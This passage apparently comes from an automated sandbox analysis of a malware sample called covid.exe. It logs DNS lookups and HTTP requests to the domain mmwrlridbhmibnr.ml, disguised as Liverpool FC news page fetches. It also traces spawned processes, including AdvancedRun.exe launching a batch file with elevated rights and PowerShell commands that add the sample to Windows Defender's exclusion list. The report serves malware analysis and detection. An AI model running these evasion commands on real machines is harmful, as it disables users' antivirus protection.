                                                                Apr 20, 2021 23:00:58.281033993 CEST53522868.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:58.766174078 CEST5606453192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:58.830171108 CEST53560648.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:59.729046106 CEST6374453192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:59.786192894 CEST53637448.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:00.913100958 CEST6145753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:01.007164955 CEST53614578.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:02.242635012 CEST5836753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:02.302493095 CEST53583678.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:03.202275991 CEST6059953192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:03.319674969 CEST53605998.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:05.239972115 CEST5957153192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:05.297350883 CEST53595718.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:06.829117060 CEST5268953192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:06.892360926 CEST53526898.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:01:07.797477007 CEST5029053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:01:07.848229885 CEST53502908.8.8.8192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 20, 2021 22:59:11.542737961 CEST192.168.2.78.8.8.80xd719Standard query (0)mmwrlridbhmibnr.mlA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 20, 2021 22:59:11.605129004 CEST8.8.8.8192.168.2.70xd719No error (0)mmwrlridbhmibnr.ml172.67.220.147A (IP address)IN (0x0001)
                                                                Apr 20, 2021 22:59:11.605129004 CEST8.8.8.8192.168.2.70xd719No error (0)mmwrlridbhmibnr.ml104.21.86.143A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • mmwrlridbhmibnr.ml

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.749702172.67.220.14780C:\Users\user\Desktop\covid.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 20, 2021 22:59:11.684930086 CEST532OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Connection: Keep-Alive
                                                                Apr 20, 2021 22:59:11.937634945 CEST534INHTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:11 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=def339989e5b144f74108a03997626ea81618952351; expires=Thu, 20-May-21 20:59:11 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:45 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad87ea00004c61831a9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SojOEnCzNZOcpPH9V09NVNMKi30bi5e6KyB4nFY2c8aLPsTGisEWiLNZoO29IbkhzyrdYcOM7hA4Ek3c%2Bd4pVRadrnwGEJy3dL9c0PXzBSaGYu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b864a8a4c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70
                                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https://i2-p
                                                                Apr 20, 2021 22:59:14.111917019 CEST1897OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Apr 20, 2021 22:59:14.335450888 CEST1899INHTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:14 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=d42fb9142b77b1729aa1493c5d642785b1618952354; expires=Thu, 20-May-21 20:59:14 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:47 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad916500004c61b3360000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYSCakQjfwectyu0TrGfii9TUdtoyg%2BiZr73ZnJbZjdPnW7Wzs%2BD%2Bo1IU7nTZp5FGx3vulWIlq3AYfw%2F8WfXWKOU9PPB8oQHT6jqOrfg%2FF0zkOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b956d844c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 62 36 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                Data Ascii: b61<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: covid.exe PID: 4912 Parent PID: 5628

                                                                General

                                                                Start time:22:59:09
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\Desktop\covid.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\covid.exe'
                                                                Imagebase:0x460000
                                                                File size:39624 bytes
                                                                MD5 hash:99E3B458DEE79B33209D39D19692AE08
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                Analysis Process: AdvancedRun.exe PID: 3192 Parent PID: 4912

                                                                General

                                                                Start time:22:59:28
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                Analysis Process: AdvancedRun.exe PID: 5528 Parent PID: 3192

                                                                General

                                                                Start time:22:59:33
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Analysis Process: powershell.exe PID: 6176 Parent PID: 4912

                                                                General

                                                                Start time:22:59:38
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                Analysis Process: powershell.exe PID: 6196 Parent PID: 4912

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                Analysis Process: conhost.exe PID: 6204 Parent PID: 6176

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: conhost.exe PID: 6212 Parent PID: 6196

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe PID: 6224 Parent PID: 4912

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                Analysis Process: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe PID: 6640 Parent PID: 6224

                                                                General

                                                                Start time:22:59:52
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >